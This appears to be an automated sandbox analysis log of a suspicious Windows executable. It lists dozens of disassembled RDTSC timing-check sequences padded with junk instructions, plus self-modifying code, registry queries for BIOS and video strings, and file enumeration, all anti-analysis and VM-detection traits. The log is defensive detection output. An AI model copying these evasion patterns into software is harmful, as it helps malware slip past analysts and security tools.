                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428588 second address: 1428590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428590 second address: 1428595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428720 second address: 1428735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142889A second address: 14288BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jbe 00007FAF1CCF565Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF1CCF565Dh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14288BE second address: 14288FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FAF1CBF1D52h 0x0000000f popad 0x00000010 push ecx 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jp 00007FAF1CBF1D46h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428CEF second address: 1428D12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF1CCF5663h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FAF1CCF5656h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1428D12 second address: 1428D1F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF1CBF1D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D5C45 second address: 13D5CB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov cx, F9C2h 0x00000010 mov ebx, dword ptr [ebp+1248ADB3h] 0x00000016 mov edi, dword ptr [ebp+122D2AADh] 0x0000001c add eax, ebx 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FAF1CCF5658h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 or di, 5F85h 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007FAF1CCF5662h 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 pop esi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1429A59 second address: 1429A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14304E4 second address: 14304EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAF1CCF5656h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14304EE second address: 14304FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431912 second address: 1431918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431918 second address: 143191C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143191C second address: 1431930 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5656h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14359D2 second address: 14359D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138C53B second address: 138C569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FAF1CCF565Eh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FAF1CCF5665h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435C7C second address: 1435C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435C82 second address: 1435C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1435C87 second address: 1435C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007FAF1CBF1D46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436296 second address: 14362AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF565Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14362AA second address: 14362AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143640A second address: 1436426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CCF5668h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436568 second address: 143656C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144363B second address: 144363F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441AB3 second address: 1441AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14421C8 second address: 14421EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FAF1CCF566Ah 0x0000000d jmp 00007FAF1CCF5664h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14421EF second address: 14421F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14421F3 second address: 14421F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442374 second address: 144238A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CBF1D52h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1449AD4 second address: 1449AE3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF1CCF5658h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1455E74 second address: 1455E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D57h 0x00000009 jng 00007FAF1CBF1D46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459B2B second address: 1459B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FAF1CCF5669h 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459CB4 second address: 1459CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF1CBF1D57h 0x00000009 jc 00007FAF1CBF1D46h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145FFD6 second address: 145FFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145FFDA second address: 145FFEC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FAF1CBF1D46h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FAF1CBF1D46h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1461640 second address: 146164A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146164A second address: 146165B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FAF1CBF1D46h 0x00000009 jp 00007FAF1CBF1D46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AFBF second address: 146AFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AFC3 second address: 146AFD3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF1CBF1D46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE2C second address: 146AE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE30 second address: 146AE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE38 second address: 146AE47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146AE47 second address: 146AE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FAF1CBF1D4Eh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007FAF1CBF1D46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476A45 second address: 1476A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF1CCF5669h 0x00000009 js 00007FAF1CCF5656h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475395 second address: 1475399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475399 second address: 14753B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FAF1CCF5660h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14753B3 second address: 14753EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FAF1CBF1D4Ah 0x0000000b popad 0x0000000c jne 00007FAF1CBF1D53h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FAF1CBF1D4Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FAF1CBF1D54h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14753EF second address: 14753F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759A4 second address: 14759B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF1CBF1D46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759B0 second address: 14759C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF1CCF5660h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14759C4 second address: 14759D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FAF1CBF1D52h 0x0000000c je 00007FAF1CBF1D46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475B31 second address: 1475B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1475B35 second address: 1475B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147671B second address: 1476725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476725 second address: 147672B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147672B second address: 1476731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1476731 second address: 147673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148C0A7 second address: 148C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAF1CCF5665h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF1CCF565Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148C0D3 second address: 148C0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E931 second address: 148E937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E937 second address: 148E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF1CBF1D46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E796 second address: 148E7A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAF1CCF5656h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E7A3 second address: 148E7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF1CBF1D51h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD620 second address: 14AD62A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF1CCF5672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC536 second address: 14AC53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC53B second address: 14AC551 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF1CCF565Ch 0x00000008 jg 00007FAF1CCF5656h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAF1CCF5656h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AC551 second address: 14AC557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ACD35 second address: 14ACD60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007FAF1CCF5656h 0x00000011 jmp 00007FAF1CCF5661h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FAF1CCF5656h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14ACD60 second address: 14ACD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14AD320 second address: 14AD324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B0001 second address: 14B0005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B01D7 second address: 14B01E1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF1CCF5656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B04AA second address: 14B04B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B04B4 second address: 14B04DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jg 00007FAF1CCF5658h 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jns 00007FAF1CCF5658h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B33CC second address: 14B33E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FAF1CBF1D46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push edi 0x0000000f jnl 00007FAF1CBF1D46h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B4F2D second address: 14B4F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF1CCF5669h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14B4F4B second address: 14B4F55 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF1CBF1D4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604DC second address: 4E604E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604E1 second address: 4E604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, C0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E604E8 second address: 4E6050E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FAF1CCF5662h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov edx, 6C5DF864h 0x00000014 push eax 0x00000015 push edx 0x00000016 mov cx, dx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6050E second address: 4E6051C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6051C second address: 4E60520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60520 second address: 4E60526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60526 second address: 4E60576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FAF1CCF5667h 0x0000000b or si, BFDEh 0x00000010 jmp 00007FAF1CCF5669h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FAF1CCF565Dh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60576 second address: 4E60587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60587 second address: 4E6058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6060A second address: 4E60642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAF1CBF1D53h 0x0000000a adc si, 301Eh 0x0000000f jmp 00007FAF1CBF1D59h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60642 second address: 4E60648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60648 second address: 4E6064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D06FB second address: 13D06FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121D9CF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121DAB4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C726D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C5B39 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13C5760 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13EB617 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 121D97E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39042
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F440F0
